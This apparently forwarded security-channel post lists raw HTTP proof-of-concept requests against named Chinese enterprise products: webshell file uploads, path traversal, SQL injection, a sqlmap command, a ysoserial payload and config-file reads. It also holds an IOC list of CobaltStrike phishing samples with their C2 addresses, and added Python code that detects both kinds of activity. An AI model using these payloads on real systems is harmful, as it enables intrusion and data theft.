润乾报表 dataSphereServlet interface: arbitrary file upload vulnerability
Fingerprint: body="润乾报表" || body="/raqsoft"
Path after upload: the web root directory
POST /servlet/dataSphereServlet?action=38 HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 397
Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9

--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain

<% out.println("123456"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="path"

../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"

1
--eac629ee4641cb0fe10596fba5e0c5d9--
启明星辰 天玥网络安全审计系统 SQL injection vulnerability
python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl
蓝凌 EKP sys_ui_component remote command execution vulnerability
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 401
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
Origin: http://www.baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Requested-With: XMLHttpRequest

------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="method"

replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="extendId"

../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition: form-data; name="folderName"

../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
赛蓝企业管理系统 ReadTxtLog arbitrary file read vulnerability
GET /BaseModule/ReportManage/DownloadBuilder?filename=/../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
数字通指尖云平台-智慧政务OA PayslipUser SQL injection vulnerability
GET /payslip/search/index/userid/www.tgoop.com/time?PayslipUser[user_id]=%28SELECT+4655+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Forwarded from 野火
某云课网校系统 (an unnamed "cloud class" online-school system): arbitrary file upload vulnerability
POST /api/uploader/uploadImage HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DInOLIXxe9m
X-Requested-With: XMLHttpRequest

------WebKitFormBoundarykvjj6DInOLIXxe9m
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/gif

<?php phpinfo();?>
------WebKitFormBoundarykvjj6DInOLIXxe9m--
用友 U8 Cloud MonitorServlet deserialization vulnerability
java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" > obj.ser
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

<raw bytes of obj.ser as the request body>
用友 NC querygoodsgridbycode SQL injection vulnerability
GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29--+dpxi HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
天问物业 ERP system AreaAvatarDownLoad arbitrary file read vulnerability
GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
用友 U8 Cloud ActionServlet SQL injection vulnerability
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
livenvr 青柿视频管理系统 channeltree interface: unauthenticated access
GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1
Host:

GET /#/screen HTTP/1.1
Host:
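The request patterns from the posts above (the dataSphereServlet and uploadImage uploads, the EKP replaceExtend traversal, the DownloadBuilder and AreaAvatarDownLoad file reads, the time-based and out-of-band SQL injection markers, the MonitorServlet deserialization POST and the unauthenticated channeltree call) turned into detection rules and run over proxy records. This is an added example, not code from the channel or from any of the vendors named; the `Request` record layout and the records in `SAMPLE_REQUESTS` are constructed for the demo, while the paths and markers are taken from the requests shown above.

```python
"""Rule-based detection for the PoC request shapes listed in the posts above.

Added example. Assumptions: a reverse proxy or WAF hands us one record per
request with method, URI, headers and (optionally) the body; the Request
class and SAMPLE_REQUESTS below are constructed test data.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import unquote_plus, urlsplit


@dataclass
class Request:
    method: str
    uri: str                              # path + query as seen on the wire
    body: str = ""                        # request body, if the proxy records it
    headers: dict = field(default_factory=dict)


def decode(s: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times so %252e%252e/ still becomes ../ ."""
    for _ in range(rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s


TRAVERSAL = re.compile(r"\.\.[/\\]")
WEBSHELL_EXT = re.compile(r'filename="[^"]+\.(?:jspx?|php\d?|phtml|aspx?)"', re.I)
SQLI_MARKERS = re.compile(r"SLEEP\s*\(|WAITFOR\s+DELAY|UTL_INADDR\.GET_HOST_ADDRESS", re.I)

# (rule name, required method or None, path regex, predicate(query, body, headers))
RULES = [
    ("runqian-dataSphereServlet-upload", "POST", r"^/servlet/dataSphereServlet$",
     lambda q, b, h: "action=38" in q and (WEBSHELL_EXT.search(b) or TRAVERSAL.search(b))),
    ("landray-ekp-replaceExtend-traversal", "POST", r"^/sys/ui/sys_ui_component/sysUiComponent\.do$",
     lambda q, b, h: "replaceExtend" in b and TRAVERSAL.search(b)),
    ("yunke-uploadImage-script-upload", "POST", r"^/api/uploader/uploadImage$",
     lambda q, b, h: WEBSHELL_EXT.search(b)),
    # Java serialization stream header is AC ED 00 05 (base64: rO0AB).
    ("yonyou-u8c-MonitorServlet-serialized-post", "POST",
     r"^/service/~iufo/nc\.bs\.framework\.mx\.monitor\.MonitorServlet$",
     lambda q, b, h: b.startswith("\xac\xed\x00\x05") or b.startswith("rO0AB")),
    ("traversal-file-read", "GET",
     r"^/(?:BaseModule/ReportManage/DownloadBuilder|HM/M_Main/InformationManage/AreaAvatarDownLoad\.aspx)$",
     lambda q, b, h: TRAVERSAL.search(q) or "web.config" in q.lower()),
    # Only meaningful if the proxy records headers; "no session at all" is the signal.
    ("livenvr-channeltree-unauthenticated", "GET", r"^/api/v1/device/channeltree$",
     lambda q, b, h: not any(k.lower() in ("authorization", "cookie") for k in h)),
    ("sqli-time-or-oob-marker", None, r".*",
     lambda q, b, h: SQLI_MARKERS.search(q) or SQLI_MARKERS.search(b)),
]


def classify(req: Request) -> list[str]:
    """Return the names of every rule the request matches."""
    parts = urlsplit(req.uri)
    path, query = decode(parts.path), decode(parts.query)
    ctype = req.headers.get("Content-Type", "")
    # multipart bodies are not URL-encoded; only decode form-urlencoded ones
    body = decode(req.body) if "x-www-form-urlencoded" in ctype else req.body
    hits = []
    for name, method, path_re, pred in RULES:
        if method and req.method.upper() != method:
            continue
        if not re.match(path_re, path):
            continue
        if pred(query, body, req.headers):
            hits.append(name)
    return hits


def scan(requests) -> list:
    """(index, matched rules) for every record that matched at least one rule."""
    out = []
    for i, r in enumerate(requests):
        hits = classify(r)
        if hits:
            out.append((i, hits))
    return out


# Constructed records (boundaries shortened, hosts/paths invented for the demo).
SAMPLE_REQUESTS = [
    Request("POST", "/servlet/dataSphereServlet?action=38",
            body='--b\r\nContent-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"\r\n\r\n'
                 '<% out.println("123456"); %>\r\n--b\r\nContent-Disposition: form-data; name="path"\r\n\r\n../../../\r\n--b--',
            headers={"Content-Type": "multipart/form-data; boundary=b"}),
    Request("GET", "/HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=..%2fweb.config"),
    Request("GET", "/service/~iufo/com.ufida.web.action.ActionServlet?action=x&method=doCopy"
                   "&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27--+"),
    Request("GET", "/api/v1/device/channeltree?serial=&pcode"),
    Request("GET", "/api/v1/device/channeltree?serial=&pcode", headers={"Cookie": "session=abc"}),
    Request("POST", "/service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet",
            body="\xac\xed\x00\x05sr\x00\x11java.util.HashSet",   # constructed stream prefix
            headers={"Content-Type": "application/octet-stream"}),
    Request("GET", "/ecp/productonsale/querygoodsgridbycode.json?code=1"),   # benign lookup
    Request("POST", "/api/uploader/uploadImage",
            body='--x\r\nContent-Disposition: form-data; name="file"; filename="1.php"\r\n'
                 'Content-Type: image/gif\r\n\r\n<?php phpinfo();?>\r\n--x--',
            headers={"Content-Type": "multipart/form-data; boundary=x"}),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_REQUESTS):
        print(i, SAMPLE_REQUESTS[i].method, SAMPLE_REQUESTS[i].uri.split("?")[0], hits)
```

The path rules are exact so that a generic scanner hitting the same product does not fire on unrelated URIs; the SQL injection rule is deliberately path-agnostic because the same `SLEEP(`, `WAITFOR DELAY` and `UTL_INADDR` markers appear across three different products above. Double URL-decoding is bounded to two rounds so that a legitimately encoded `%2525` does not keep unfolding.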
Vulnerabilities not yet reproduced successfully
北京筑业建设工程资料同步跟踪检查与流转交互云平台 password reset vulnerability
同鑫科技 EHR system (all series) SQL injection vulnerability
金和 OA C6CreateGroup interface injection vulnerability
奇安信天擎 remote code execution vulnerability
Forwarded from 野火
http://mp.weixin.qq.com/s?__biz=MzIzMjg0MjM5OQ==&mid=2247487525&idx=1&sn=08b4933e7c3cb369d6ef24ec08249729
2024 重点保障安全意识培训参会人员名单.zip (attendee list for the 2024 key-assurance security awareness training)
SHA256: c9d2dca72286c01e068b1995e3aa7772ff9686a492b89e8b8c7b0ecaf715cf40
MD5: eb97e771dc4dd54c18553471d5fe3bbb
C2: 110.41.46.45:9111
Technique: Rust; APC-invoked CobaltStrike trojan
关于 2024 年公司财务调整的通知.exe (notice on the company's 2024 financial adjustments)
SHA256: d44f628b8e447249ef9ce8871350c52693c1f31cb126307be9f1b2c535053a4a
MD5: 248b44673cbb0384180fc62ca972f018
Source: 向日葵 (Sunlogin) multi-protocol RDP plugin
关于 2024 攻防演练员工守则通知.exe (notice on employee rules for the 2024 attack-and-defense exercise)
SHA256: bccd982dab220d22689cf81277789ef64b32f575a08f604e1a75da1d5d6aee10
MD5: 1c26667276b0f3f69ab55bf8b34fdd22
C2: 8.134.249.167:9099
Technique: uses WeChat to detect virtual machines; backdoor trojan
集团“星火计划”推荐学员参加选拔考试通知_docx.exe (notice recommending trainees of the group's "Spark Plan" for the selection exam)
SHA256: 54a28a2bc66c4529aaf2c7b92d724f2a2943dcd12bb960f43e6d34cf90ace700
MD5: 7c29a8b9e872af42b5d92dc98f87a917
C2: 59.42.126.162:80
Source: CobaltStrike trojan
徐加李简历.docx.exe (résumé of 徐加李)
SHA256: d86db50d6990d345a1280991b757c770b661d94592a68a95c48b189b7ac4bf50
MD5: b97e176e0ee5987ddfe98e056df343e9
SHA1: 3bdde433ae2579d8270110fa6281e2feca7d6225
**金融(渠道经理).zip (** Finance, channel manager)
SHA256: 431d010c90b451c107d4160bb134ff072cf8c7076f16ab516faa2d31ef3c4759
MD5: 6330fab9ce531ce8943132272a3cb2a7
Related IP/domain/C2: mobile.static.apiproxy.cloud.360.net / mobile.static.apiproxy.cloud.360.net.cdn.dnsv1.com:443
Technique: domain-fronted CobaltStrike trojan
**会议(去除 30 分钟限制).exe (** Meeting, "30-minute limit removed")
SHA256: ac962605550d120d4d38ba87a10c87027c7ccb3f430475c0104646183bc6f825
MD5: 2a04ff4412e48aabdc6fc073ae734cd2
C2: 154.12.83.210:54123
Technique: decrypts and runs the payload from the resource section; CobaltStrike trojan
**有限公司社会招聘报名登记表.exe (** Co., Ltd. external recruitment registration form)
SHA256: 02bbeb4d9d6f13fe1db44a0a2da572b1596d9ff59b79376e8afaeab0ba76a1d6
MD5: 09c7199b2bcd0d908a2b8d6867a1b240
C2: 2gwxrah28rj0z.cfc-execute.bj.baidubce.com
Technique: junk code to burn sandbox time; Rust CobaltStrike trojan
第三周周报.exe (week 3 weekly report)
SHA256: 090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4
MD5: 5cd7b3e9950c5169a5278bdee38438ef
C2: 2gwxrah28rj0z.cfc-execute.bj.baidubce.com, downloadlog.oss-cn-chengdu.aliyuncs.com
Technique: Go-compiled; fetches an encrypted payload from object storage; CobaltStrike trojan
测试 tdp (2).zip (test tdp (2))
SHA256: 13d7483a1f1a0b72aaa09ec985797556eeb402c893013a5bc08b706300c5bb3d
MD5: e2eba605cf1b6822e1bd9cb06bd334db
C2: 101.200.150.8:8089
Technique: stock CobaltStrike trojan
《关于集团网络资产评估管理有关事项的通知》.exe (notice on matters concerning the group's network asset assessment management)
SHA256: f1d4316a2c7bccf197ee6209389fe1ad7aef8a3b94aebae5548c8d1a05f036cd
MD5: 1b50d0cc313552072462327588f93a49
C2: 117.50.187.104:443
Source: CobaltStrike trojan
对于**有限公司的异议书.exe (letter of objection against ** Co., Ltd.)
SHA256: 7b9c13919a006396b8c60eeaa54bd5728ef70aa7b7890232f3752506243a3e66
MD5: 32a8cade2024195a71aeb1ebbd1c296f
C2: 175.178.226.246:33333
Source: CobaltStrike trojan
artifact.exe
SHA256: c716ebfc4ae128c5d3b5a882683d7ca833bc4f339909cba4153425d4df765954
MD5: 9974ad03575c5a8bfae6f2bb787321ea
C2: 39.101.122.168:89
Source: CobaltStrike trojan
***服务平台-存在弱口令漏洞.exe (*** service platform - weak password vulnerability found)
SHA256: 2358438e0c5931b12b2233d449354d3db21e17c350fdf171298c6665514bc655
MD5: aef9c59cb030b7e4038ca9850c95f8a2
C2: www.tencentcloud.site
Technique: DLL side-loading ("white plus black"); CobaltStrike trojan
杨*.rar
SHA256: 7a5fdc1afaadd9d3673b922c45d65061b0ac01f9ffce6b0aec1126d843561f72
MD5: 6a0427a10e8e51b1db6c5670fe071f82
Related IP/domain: 36.249.64.101:443 (CDN), www.jinsixian.cn (Host)
Technique: domain-fronted CobaltStrike trojan
Desktop.exe
SHA256: ce19a3062a20d0f2b0bc2a774c11912214aba6e27a191ae31bb96bf6610ca765
MD5: 65c7f30fde67152da3176a8b55577acc
C2: 101.132.194.179:8081
Source: CobaltStrike trojan
edragent
SHA256: e3ef6b7090bba1ca1590f09538f2261d78dbfbea1435dd99b1e8e12e1636bbe5
MD5: a7a2d23e0b1941876d043f0af6e71110
C2: 139.196.210.163:50010
Source: CobaltStrike trojan
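The IOC list above is plain text: a sample name followed by hash, C2 and technique lines. Below is a parser for that layout plus a matcher that runs the indicators over host and network events, as an added example (not code from the channel). The `IOC_TEXT` block copies three entries from the list above; the `EVENTS` list and the event field names (`sha256`, `dst`, `port`, `query`) are constructed for the demo. It also carries the caveat a practitioner would want: the `36.249.64.101:443 (CDN)` entry is a shared CDN edge used for domain fronting, so a hit on that IP alone is reported as low confidence.

```python
"""Parse the channel's IOC list and match it against host/network events.

Added example. IOC_TEXT is copied from three entries in the list above;
EVENTS is constructed test data; the event schema is an assumption.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

IOC_TEXT = """\
2024 重点保障安全意识培训参会人员名单.zip
SHA256: c9d2dca72286c01e068b1995e3aa7772ff9686a492b89e8b8c7b0ecaf715cf40
MD5: eb97e771dc4dd54c18553471d5fe3bbb
C2: 110.41.46.45:9111
Technique: Rust; APC-invoked CobaltStrike trojan
第三周周报.exe
SHA256: 090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4
MD5: 5cd7b3e9950c5169a5278bdee38438ef
C2: 2gwxrah28rj0z.cfc-execute.bj.baidubce.com, downloadlog.oss-cn-chengdu.aliyuncs.com
Technique: Go-compiled; fetches an encrypted payload from object storage; CobaltStrike trojan
杨*.rar
SHA256: 7a5fdc1afaadd9d3673b922c45d65061b0ac01f9ffce6b0aec1126d843561f72
MD5: 6a0427a10e8e51b1db6c5670fe071f82
Related IP/domain: 36.249.64.101:443 (CDN), www.jinsixian.cn (Host)
Technique: domain-fronted CobaltStrike trojan
"""

# Accepts the English labels used above and the original Chinese ones.
LABEL_RE = re.compile(
    r"^(SHA256|SHA1|MD5|C2|Technique|Source|Related IP/domain(?:/C2)?|攻击手法|来源|相关IP域名(?:/C2)?)"
    r"\s*[:：]\s*(.*)$")
HASH_LABELS = ("SHA256", "SHA1", "MD5")
NET_LABELS = ("C2", "Related IP/domain", "Related IP/domain/C2", "相关IP域名", "相关IP域名/C2")


@dataclass
class Indicator:
    host: str
    port: Optional[int]
    shared: bool          # True for a CDN edge that legitimate traffic also uses


@dataclass
class Sample:
    name: str
    hashes: dict = field(default_factory=dict)    # algo -> lowercase hex
    network: list = field(default_factory=list)   # list[Indicator]
    notes: dict = field(default_factory=dict)     # Technique / Source text


def _parse_endpoints(value: str) -> list:
    out = []
    for token in value.split(","):
        token = token.strip()
        if not token:
            continue
        shared = re.search(r"\(CDN\)", token, re.I) is not None
        token = re.sub(r"\s*\([^)]*\)", "", token).strip()   # drop "(CDN)" / "(Host)"
        host, _, port = token.rpartition(":")
        if host and port.isdigit():
            out.append(Indicator(host, int(port), shared))
        else:
            out.append(Indicator(token, None, shared))
    return out


def parse_iocs(text: str) -> list:
    """A line that is not a labelled field starts a new sample."""
    samples = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LABEL_RE.match(line)
        if not m:
            samples.append(Sample(name=line))
            continue
        if not samples:
            raise ValueError(f"field before any sample name: {line}")
        label, value = m.group(1), m.group(2).strip()
        cur = samples[-1]
        if label in HASH_LABELS:
            cur.hashes[label.lower()] = value.lower()
        elif label in NET_LABELS:
            cur.network.extend(_parse_endpoints(value))
        else:
            cur.notes[label] = value
    return samples


def match_events(samples: list, events: list) -> list:
    """Return (event_index, sample_name, confidence, reason) for every hit.

    Event shapes (assumed): {"type": "file", "sha256"/"md5"/"sha1": hex},
    {"type": "net", "dst": ip_or_host, "port": n}, {"type": "dns", "query": name}.
    """
    hits = []
    for i, ev in enumerate(events):
        for s in samples:
            if ev["type"] == "file":
                for algo, digest in s.hashes.items():
                    if ev.get(algo, "").lower() == digest:
                        hits.append((i, s.name, "high", f"{algo} match"))
                continue
            key = ev["dst"] if ev["type"] == "net" else ev["query"]
            for ind in s.network:
                if ind.host.lower() != key.lower():
                    continue
                if ev["type"] == "net" and ind.port is not None and ev.get("port") != ind.port:
                    continue
                if ind.shared:
                    hits.append((i, s.name, "low", "shared CDN edge; confirm with Host/SNI"))
                else:
                    hits.append((i, s.name, "high", "C2 endpoint"))
    return hits


# Constructed events: one true hash hit, one C2 hit, one wrong-port miss,
# one DNS hit, one CDN-only low-confidence hit, one clean file.
EVENTS = [
    {"type": "file", "path": "Downloads/第三周周报.exe",
     "sha256": "090a42171e42477dbcf0d02a4e901e8eb20cfde8c1765c9a67a84bafd256b2a4"},
    {"type": "net", "dst": "110.41.46.45", "port": 9111},
    {"type": "net", "dst": "110.41.46.45", "port": 443},
    {"type": "dns", "query": "downloadlog.oss-cn-chengdu.aliyuncs.com"},
    {"type": "net", "dst": "36.249.64.101", "port": 443},
    {"type": "file", "path": "setup.exe", "sha256": "00" * 32},
]

if __name__ == "__main__":
    for hit in match_events(parse_iocs(IOC_TEXT), EVENTS):
        print(hit)
```

Port is enforced for network events because several of the listed C2 addresses sit on cloud ranges where other ports are unrelated tenants; for DNS events only the name is compared. The `shared` flag comes straight from the "(CDN)" annotation in the list, which is the only cue the post gives that the IP is not attacker-owned.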